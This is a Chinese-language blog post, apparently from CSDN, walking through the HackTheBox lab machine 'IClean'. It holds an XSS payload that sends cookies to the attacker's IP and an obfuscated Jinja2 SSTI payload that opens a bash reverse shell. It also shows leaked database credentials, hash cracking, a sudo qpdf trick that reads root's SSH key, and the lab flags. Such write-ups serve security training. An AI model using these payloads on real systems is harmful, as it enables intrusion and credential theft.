[Meachines][Medium]IClean

最新推荐文章于 2024-07-19 15:14:56 发布
最新推荐文章于 2024-07-19 15:14:56 发布
阅读量318 收藏 5
点赞数 10
分类专栏: HackTheBox 文章标签: ios
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/138168310
版权

Main

$ nmap -p- -sC -sV 10.10.11.12 -Pn --min-rate 1000

image.png

$ echo "10.10.11.12 capiclean.htb">>/etc/hosts

image.png

这题可能和python的SSTI有关

image.png

$ gobuster dir --url "http://capiclean.htb" --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt

image.png

http://capiclean.htb/quote
存在一处服务订购提交页面,不是一个查询服务所以sql注入的可能性就小很多

image.png

image.png

<img src='http://10.10.16.23/' onerror='fetch("http://10.10.16.23?c="+document.cookie)' />

image.png

image.png

这里如果没有cookie就新建一个

把path改成/
image.png

访问dashboard

image.png

在InvoiceGenerator用于生成订单

image.png

将生成的订单id来到QRGenerator生成二维码扫描

image.png

这是一份账单

image.png

在qr_link参数中,{{4*4}}在响应包中返回16证明存在SSTI

image.png

{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash -c 'bash -i >& /dev/tcp/10.10.16.23/10032 0>&1'")|attr("read")()}}

image.png

在app.py中发现泄露了数据库配置信息

image.png

db_config = { 'host': '127.0.0.1', 'user': 'iclean', 'password': 'pxCsmnGLckUb', 'database': 'capiclean' }

$ mysql -u iclean -p

image.png

mysql> use capiclean;
mysql> select * from users;
image.png

将consuela的哈希进行破解

$ echo "0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa">hash

$ hashcat -m 1400 -a 0 hash /usr/share/wordlists/rockyou.txt

image.png

simple and clean

User Flag

$ su consuela
$ cat /home/consuela/user.txt

image.png

e4fb54144493b2df71de87281902e002

Root Flag

$ sudo -l

image.png

  • /usr/bin/qpdf 是一个用于处理PDF文件的命令行工具。它可以执行各种PDF文件操作,包括合并、拆分、解密、加密、旋转页面等。QPDF提供了丰富的功能和选项,可以让用户在命令行下方便地进行PDF文件的处理。

$ sudo /usr/bin/qpdf --empty /tmp/key.pdf --qdf --add-attachment /root/.ssh/id_rsa --
$ cat /tmp/key.pdf

image.png

通过私钥登录Root用户

$ chmod 400 id_rsa ;ssh -i id_rsa root@10.10.11.12

root@iclean:~# cat /root/root.txt

image.png

e9f42fab26856026679cbcd1bb76b7ed

Мартин.
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Clean Medium-crx插件
04-05
语言:English (United States) 允许用户看不到“中等”帖子的巨大页脚和页眉,并创建更好的阅读体验。 这是一个非常轻巧的扩展,仅用于从中等文章中删除页眉和页脚,以提供更好的阅读体验。 当您阅读任何提供商的...
PingFang SC Medium
02-26
标题 "PingFang SC Medium" 指的是一款字体,这是一种特定的字形设计,用于在数字设备上显示文本。PingFang SC是PingFang系列字体中的一个变体,SC代表“简体中文”(Simplified Chinese)。这款字体旨在提供清晰、...
图像生成新篇章:Stable Diffusion 3 Medium开源评析
孙佰贵的专栏
06-14 3782
在数字艺术与AI的交汇处,Stable Diffusion 3(SD3)Medium版本的开源标志着技术革新的新篇章。继3月份我在CSDN上发表的SD3技术博文后,这一新里程碑的实现,展示了AI在图像生成领域的显著进步。通过Hugging Face平台的开源,SD3 Medium不仅为艺术创作提供了新土壤,也推动了文生图社区的发展。尽管存在挑战,社区的协作和技术创新将不断解锁创造潜力,引领我们进入数字艺术的新纪元。
medium_socnet靶场
wcl20010的博客
05-02 2727
1.主机发现 arp-scan -l nmap -p 1-65535 -A 192.168.128.140 发现的22 5000端口 通过服务级别的探测 nmap -p22,5000 -sV 192.168.128.140 2.漏洞发现 发现一个信息:说明服务使用python的脚本编写 Werkzeug httpd 0.14.1 (Python 2.7.15) 知道一个网页,发现不到信息尝试进行目录扫描,使用工具dirb或者dirsearch dirsearch -u http://
访问Medium
s_crawler的博客
07-31 2701
打开hosts文件(C:\Windows\System32\drivers\etc\hosts),向其中添加: # Medium Start 104.16.120.127 medium.com 104.16.120.145 api.medium.com 104.16.120.145 cdn-static-1.medium.com 104.16.120.145 cdn-images-1.m...
SSL Medium Strength Cipher Suites Supported (SWEET32)
热门推荐
par@ish的博客
05-06 1万+
Description The remote host supports the use of SSL ciphers that offer medium strength encryption. Nessus regards medium strength as any encryption that uses key lengths at least 64 bits and less than 112 bits, or else that uses the 3DES encryption suite.
Android 添加中文medium字体
lb5761311的专栏
08-21 8145
2.1 Android字体显示框架图 Android显示字体medium字体主要流程: a).View布局文件或者代码中选择medium字体 b).Framework根据View设置的字体选择相应medium的字体库 c).根据framework提供的字体库Skia引擎绘制相应medium的字体 主要流程图如下: 3. NotoSansCJKsc-Medium中文字体使用方法 Android可以...
0x01-medium_socnet
rec09er的博客
04-09 5381
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-social-network,454/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 通关目标:拿下目标靶机的root权限 攻击机:kali 目标靶机:medium_socnet 涉及攻击方法: ● 主机发现 ● 端口服务扫描 ● web侦查 ● 目录扫描 ● 代码注入 ● 反弹shell ● 内网信息搜集 ● 内
Medium是什么
qq_18730155的博客
06-16 1万+
    罗永浩关于时间机器的解读中提到,人类还没有能力做出时间机器,让人们可以回到过去或者穿越未来,但是,在某种特殊条件下,却可以得到跟乘坐时间机器一样的效果,比如学习,学习是一种获得前人的经验应用到自己身上的一种行为,前人的经验可能需要几十年或者几百年才能获得,但是人们通过学习,却可以在很短的时间里获得。同样的道理,如果我们在封闭的空间学习到了外边世界的先进经验,我们就相当于获得了外边世界的时间...
安卓中的 Medium 字重
sinat_25136209的博客
06-28 7847
关于安卓字体,ui的设计稿上是不是经常出现,这样的 字重 Medium, 但是textview 中找了半天也没有啊,于是打开百度,面向百度编程。 找了一些字体,直接贴代码吧,xml文件,直接复制过去,就能有明显的对比。 <?xml version="1.0" encoding="utf-8"?> <LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:app="http://sch
Medium无限文章阅读会员插件
weixin_43691607的博客
12-17 3206
https://github.com/manojVivek/medium-unlimited
medium 高级文章限制解决办法
yuexiaomao的博客
01-19 2056
最近学习一些模型,搜到了medium,但是看了三篇高级文章之后需要每个月交5$,可我很穷,后来发现可以将要阅读的链接贴到其他博客里面,然后用没有medium cookie登录的浏览器点击链接,重定向一次看就可以,这篇文章就留着这么用吧。 1、openai GPT2介绍 https://towardsdatascience.com/openai-gpt-language-modeling-on-...
medium hackd
11-24
国外的medium文章查看,某些文章会需要收费,为了方便学习知识,但是由于收费限制,可以通过谷歌插件hack掉查看
【iOS】——消息传递底层实现
最新发布
m0_73974920的博客
07-19 913
OC在编译时会根据方法的名字(包括参数序列),生成一个用来区分这个方法的唯一的一个ID,这个ID就是SEL类型的。如果在当前类对象的缓存中找到了转发的条目(imp == forward_imp),表示在父类的缓存中找到了转发的方法实现。第一 个参数代表接收者也就是方法调用者,第二个参数代表方法选择器(SEL 是选择子的类型)也就是方法的名字,后续参数就是消息中的 那些参数,其顺序不变。最后,在循环结束后,会根据需要将找到的方法实现缓存到类对象的缓存中,然后解锁运行时锁,并根据需要返回找到的方法实现或空值。
【iOS】——MRC
m0_73974920的博客
07-16 1190
内存管理的核心是引用计数器,用一个整数来表示对象被引用的次数,系统需要根据引用计数器来判断对象是否需要被回收。在每次 RunLoop 迭代结束后,都会检查对象的引用计数器,如果引用计数器等于 0,则说明该对象没有地方继续使用它了,可以将其释放掉。
【iOS】—— 继承者链
qq_72437394的博客
07-16 925
对象的isa指针指向类,类也是一种对象被称为类对象,其isa的指向是元类。元类是系统给的,定义和编译是由编译器完成的。每个类都有独一无二的元类,用来存储类方法。对象 --> 类 --> 元类 --> NSobject,NSObject指向自身。
axios以post方式提交表单形式数据
duansamve的博客
07-15 356
某些后端框架请求接口必须走form表单提交的那种形式,但前端很少有这种写法去提交表单数据,所以前端需要用axios模拟一个表单提交接口。Content-Type 代表发送端(客户端/服务器)发送的实体数据的数据类型。
【iOS】—— 编译链接
qq_72437394的博客
07-17 721
dyld(the dynamic link editor)是苹果的动态链接器,是苹果操作系统一个重要组成部分,在系统内核 XNU 完成 Mach-O 文件的加载,做好程序准备工作之后,交由 dyld 负责余下的工作。​ **优点:**节省磁盘空间,且多个用到相同动态库的程序同时运行,库文件会进行共享。**在编译的时候动态库不会被拷贝到程序中,只会存储下动态库的引用,等找到真正使用的时候才回去查找-绑定-使用函数。​ **优点:**在编译链接的时候被整合到可执行文件中,是程序运行的时候独立,不依赖外部库。
iOS——MRC与ARC以及自动释放池深入底层学习
m0_73348697的博客
07-16 768
在前面,我们简单学了MRC与ARC。MRC指手动内存管理,需要开发者使用retainrelease等手动管理对象的引用计数,确保对象在必要时被释放。ARC指自动内存管理,由编译器自动管理对象的引用计数,开发者不需要手动管理内存。这是因为。
dvwa medium
06-13
DVWA (Damn Vulnerable Web Application) 是一款非常流行且广泛使用的开源Web应用程序安全测试平台。它被设计用来帮助学习者和专业人士了解常见的Web应用程序漏洞,如SQL注入、XSS攻击、文件包含漏洞等。Medium难度的场景在DVWA中意味着它包含了一些更复杂或高级的漏洞,适合有一定经验的安全研究人员或开发者进行实战练习和提高安全防御能力。 在DVWA Medium模块中,你可能会遇到如下挑战: 1. 需要对OWASP Top 10(开放网络应用安全项目)有所了解,特别是针对中高风险漏洞的部分。 2. 漏洞可能隐藏得更深,需要理解如何通过代码分析和利用各种工具来探测。 3. 一些高级技术,如CSRF(跨站请求伪造)或二次确认机制,可能会在Medium级别出现。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值